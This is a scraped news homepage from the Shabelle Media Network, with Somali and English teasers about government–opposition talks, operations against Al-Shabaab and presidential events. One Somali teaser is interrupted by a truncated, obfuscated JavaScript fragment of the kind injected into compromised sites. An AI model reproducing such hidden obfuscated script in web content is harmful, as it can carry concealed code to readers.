Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Dowladda Soomaaliya oo Weerar Afka ah Ku Qaaday Mucaaradka 

Muqdisho — Dowladda Federaalka Soomaaliya ayaa si adag uga jawaabtay eedeymaha uga imaanayay mucaaradka gaar ahaan kuwa kooxda Samatabixinta oo dhowr jeer ku celceliyay in la burburiyay ciidankii qaranka ee loogu talagalay difaaca dalka.   Wasiirka Gaashaandhigga Soomaaliya, Axmed Macallin Fiqi, oo booqasho ku tagay xerada ciidanka Gorgor ee magaalada Muqdisho, ayaa halkaas kula hadlay boqolaal askari oo ka tirsan xoogga...

Somali Forces and Local Militias Launch Major Offensive Against Al-Shabaab in Central Region

MASAAJID CALI GADUUD – Somali government troops backed by local militias have launched a large-scale military operation in the central Middle Shabelle region, targeting areas previously controlled by the Al-Qaeda-linked group Al-Shabaab, security sources and residents said on Thursday.   The operation is concentrated around Masaajid Cali Gaduud, a strategic town recently recaptured by Somali forces after being held by Al-Shabaab fighters...

Ciidamada Xoogga Dalka iyo Macawiisleyda Deegaanka oo Howlgallo Ballaaran ka Wada Shabeellaha Dhexe

Masaajid Cali Gaduud, Juun 26, 2025 – Ciidamada Xoogga Dalka Soomaaliyeed (XDS) iyo kuwa deegaanka ee loo yaqaan Macawiisleyda ayaa wada howlgallo milatari oo ballaaran oo ka socda deegaanno hoostaga gobolka Shabeellaha Dhexe, gaar ahaan agagaarka Masaajid Cali Gaduud, halkaas oo ciidamada dowladda ay dhawaan la wareegeen gacan ku haynteeda.   Howlgalladan oo ah kuwo qorshaysan ayaa ka socda tuulooyin ay...

Somali President Urges Unity and Dialogue in his Independence Day Address

MOGADISHU – Somali President Hassan Sheikh Mohamud on Wednesday emphasized the importance of national unity, reconciliation, and inclusive dialogue during his annual speech marking the anniversary of the northern regions' independence from British colonial rule.   Speaking at a ceremony commemorating June 26, the date on which British Somaliland gained independence in 1960, President Mohamud called on political opponents to engage...

Madaxweyne Xasan Sheekh: “Midnimo, Is-afgarad iyo Wadahadal ayaa ah furaha mustaqbalka Soomaaliya”

Muqdisho – Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya, Xasan Sheekh Maxamuud, ayaa khudbaddiisa sanadlaha ah uga jeediyay shacabka Soomaaliyeed xuska 26-ka Juun, oo ah maalinta xornimada Gobollada Waqooyi, isagoo si qoto dheer uga hadlay muhiimadda midnimada, is-afgaradka, iyo heshiis bulsho.   Madaxweynaha ayaa carrabka ku adkeeyay in midnimada dalka aysan ahayn aragti siyaasadeed oo keli ah, balse ay tahay arrin dastuuri ah oo...

Somali president, opposition agree on key agenda as talks adjourn until July 3

MOGADISHU, June 25, 2025 – A high-level meeting between Somali President Hassan Sheikh Mohamud and opposition leaders from the Salvation Forum concluded on Wednesday, with both sides agreeing to resume talks on July 3, after the country’s Independence Week celebrations.   The talks, held in Mogadishu, focused on setting a joint agenda for ongoing political dialogue between the government and opposition....

Villa Somalia oo war kasoo saartay Kulankii MW Xasan Sheekh iyo Mucaaradka

MUQDISHO, Soomaaliya - Kulankii Maanta ee Madaxweynaha JFS Xasan Sheekh, Guddiga Dowladda ee u xil-saaran wadahadallada iyo xubnaha Madasha Samatabixinta,   Waxaa la isku raacay in laga wadahadlo afar ajende oo muhiim u ah dowlad-dhiska dalka, kuwaas oo kala ah: 1-Adekeynta midnimada dalka, 2-Hanaanka dib u eegista dastuurka, 3-Amniga iyo ciribtirka argagixisada, 4-Hanaanka doorashooyinka tooska ah oo heshiis lagu yahay. function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function...

Somali President Meets Opposition Leaders as Part of National Dialogue Effort

Mogadishu – Somali President Hassan Sheikh Mohamud met with a group of opposition leaders on Wednesday at the Presidential Palace in Mogadishu, as part of ongoing efforts to build consensus through the National Dialogue initiative launched earlier this month.   The meeting included prominent figures from opposition parties, former senior government officials, and influential political actors. According to a statement from...

Mucaaradka oo Villa Somalia kula kulmay Madaxweyne Xasan Sheekh

MUQDISHO - Madaxweynaha Soomaaliya Xasan Sheekh Maxamuud, ayaa maanta si rasmi ah Madaxtooyada Qaranka ugu qaabilay mas’uuliyiinta Mucaaradka oo isugu jira Madaxweyne hore, Ra’iisul Wasaareyaal hore, Guddoomiyihii hore ee Baarlamaanka Federaalka Soomaaliya iyo xubno kale oo ka tirsan hoggaanka siyaasadeed ee dalka.   Kulankan ayaa qeyb ka ah dadaallada socda ee Madaxweynaha uu ku horumarinayo Gogosha Wadatashiga Qaran oo dhawaan si...

Boosaaso governor orders businesses to fund Puntland forces fighting ISIS

BOSASO, Somalia - The governor of Boosaaso, the commercial capital of Puntland, Abdifitah Mohamed Osman, issued strict orders demanding local businesses and traders contribute financially to support Puntland security forces battling ISIS.   In a public statement, Governor Abdifitah warned that any company or business that fails to comply with the fundraising directive will face closure or removal from the city. “Businesses...

WARAR KALE

Madaxweyne Xasan Sheekh oo mashaariic daah-furay Caasimadda HirShabeelle

MUQDISHO - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya, Mudane Xasan Sheekh Maxamuud iyo wafdi uu hoggaaminayo ayaa maanta si diirran loogu soo dhoweeyey magaalada Jowhar ee...

Somali President Inaugurates Development Projects During Visit to Hirshabelle Capital

JOWHAR, Somalia — Somali President Hassan Sheikh Mohamud on Thursday inaugurated a series of development projects and government facilities in the central town of...

SouthWest State Leader Sheikh Aden Madobe Formally Assumes Office in Baidoa

BAIDOA, Somalia – The newly elected leader of Somalia's South West State, Sheikh Aden Mohamed Nur, widely known as Aden Madobe, formally assumed office...